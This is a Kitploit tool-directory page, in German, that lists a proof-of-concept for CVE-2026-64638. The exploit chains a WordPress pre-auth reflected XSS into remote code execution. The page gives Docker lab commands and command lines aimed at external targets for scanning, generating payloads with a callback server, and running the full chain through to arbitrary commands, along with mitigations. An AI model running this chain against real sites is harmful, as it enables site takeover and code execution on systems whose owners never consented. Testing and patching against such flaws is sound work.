Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-64638-POC — CVE-2026-64638: WordPress Pre-Auth-XSS → RCE (XSS2Shell) PoC | Kitploit
Tools/GitHubGitHub/imbas007/cve-2026-64638-poc
Web-SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubimbas007/cve-2026-64638-poc

CVE-2026-64638-POC

CVE-2026-64638: WordPress Pre-Auth-XSS → RCE (XSS2Shell) PoC

Repository anzeigen
11324vor 1 MonatNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-64638 — XSS2Shell

Reflektiertes XSS vor der Authentifizierung → Remote-Codeausführung im WordPress-Core

License WordPress CVE

⚠️ HAFTUNGSAUSSCHLUSS: Dieses Repository dient ausschließlich autorisierten Sicherheitsforschungs- und Bildungszwecken. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben. Unbefugter Zugriff ist illegal. Siehe SECURITY.md.


Übersicht

CVE-2026-64638 ist ein reflektiertes XSS vor der Authentifizierung in der Login-/wplogin-Verarbeitungspipeline des WordPress-Core. Der Fehler beruht auf einer Parser-Differenz, bei der fehlerhaft formulierte Eingaben PHP's strip_tags() überleben, aber später von wp_kses_post() als HTML rekonstruiert werden, sodass vom Angreifer kontrolliertes Markup das DOM erreichen kann.

Forscher von pwn.ai demonstrierten XSS2Shell — eine Angriffskette, die dieses XSS auf einer Standard-WordPress-Installation zu vollständiger PHP-Codeausführung eskaliert, wenn ein authentifizierter Administrator mit vom Angreifer kontrollierten Inhalten interagiert.

EigenschaftWert
CVECVE-2026-64638
CVSS8.9
TypReflektierte XSS → RCE-Kette
KomponenteWordPress-Core-Anmeldeseite
BetroffenWordPress < 7.0.3 (Backports bis 4.7)
BehobenWordPress 7.0.3 (6. August 2026)
GrundursacheParser-Differenz: strip_tags() vs. wp_kses_post()

Schnellstart (Docker)

git clone https://github.com/<your>/CVE-2026-64638-POC.git
cd CVE-2026-64638-POC

# One command — spin up vulnerable WordPress 7.0.2 + run full chain
./test.sh up
./test.sh chain

Was passiert:

[STAGE 1] WordPress 7.0.2 → VULNERABLE
[STAGE 2] XSS payload URL generated
[STAGE 3] Application Password created
[STAGE 4] Plugin uploaded + activated
[STAGE 5] RCE → uid=33(www-data)

Alle Befehle

./test.sh up         # Start Docker + install WordPress (admin/admin123)
./test.sh scan       # Detect version & patch status
./test.sh chain      # Run full XSS2Shell RCE chain
./test.sh all        # up + scan + chain (all-in-one)
./test.sh down       # Stop containers
./test.sh clean      # Stop + remove all volumes

# Or with Make
make up              # Start Docker
make install         # Install WordPress
make scan            # Check vulnerability
make gen-xss         # Generate XSS payload URL
make test-chain      # Full RCE chain
make serve           # Start callback server on :8080
make down            # Stop containers

Repository-Struktur

CVE-2026-64638-POC/
├── README.md
├── SECURITY.md              # Security policy & disclaimer
├── docker-compose.yml        # WordPress 7.0.2 + MySQL 8 + WP-CLI
├── Makefile                  # Shortcut commands
├── test.sh                   # Automated test suite
├── requirements.txt          # Python dependencies
│
├── xss2shell_chain.py       # [MAIN] Full chain: scan → XSS → app-password → plugin → RCE
├── xss2shell_scanner.py     # Version detection + username reflection test
├── xss2shell_checker.py     # Lightweight patch checker (safe, non-exploitative)
├── exploit_server.py        # Callback server for XSS exfiltration
├── xss_payload.html         # Interactive XSS PoC (browser)
│
└── docs/
    ├── CHAIN.md             # Technical breakdown of all 7 chain stages
    ├── MITIGATION.md        # Defensive guidance + detection rules
    └── PAYLOAD_NOTES.md     # Notes on the CVE-specific bypass payload

Manuelle Verwendung (externes Ziel)

python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt

# Scan target
python3 xss2shell_chain.py scan -u https://target.example.com

# Generate XSS payload
python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080

# Full chain (requires WordPress admin credentials)
python3 xss2shell_chain.py chain \
    -u https://target.example.com \
    --user admin --pass "password" \
    --cmd "id"

# Individual stages
python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"

Die XSS2Shell-Angriffskette

Vollständige Details finden Sie in docs/CHAIN.md.

┌─────────────────────────────────────────────────────────────────┐
│  1. Reflected XSS on wp-login.php (failed-login error page)    │
│  2. DOM clobbering to manipulate page context                   │
│  3. JSONP / Same-Origin Method Execution (SOME)                 │
│  4. Application Password creation via REST API                  │
│  5. REST API access with stolen Application Password            │
│  6. Malicious plugin/theme upload                               │
│  7. PHP code execution → full RCE                               │
└─────────────────────────────────────────────────────────────────┘

Hinweis: Die Stufen 3-7 erfordern einen angemeldeten Administrator, der mit dem XSS-Payload interagiert. Die Schwachstelle ist vor der Authentifizierung ausnutzbar, aber die vollständige RCE-Kette erfordert Administratorzugriff, um abgeschlossen zu werden.


Gegenmaßnahmen

  1. WordPress sofort auf 7.0.3 oder neuer aktualisieren
  2. Automatische Hintergrund-Updates aktivieren
  3. Anwendungs-Passwörter überprüfen (Benutzer → Profil)
  4. Protokolle auf verdächtige fehlgeschlagene Login-Benutzernamen prüfen
  5. Plugin-/Theme-Upload-Aktivitäten überwachen

Detaillierte Härtungs- und Erkennungsregeln finden Sie in docs/MITIGATION.md.


Referenzen

  • WordPress 7.0.3 Security Release
  • pwn.ai XSS2Shell Blog
  • pwn.ai SOME/CSP Bypass Writeup
  • The Hacker News Coverage
  • The CyberSec Guru Article
  • CVE Record

Autor

Sicherheitsforschung & PoC. Nur für Bildungszwecke.

Lizenz

MIT — Siehe LICENSE

Tool herunterladen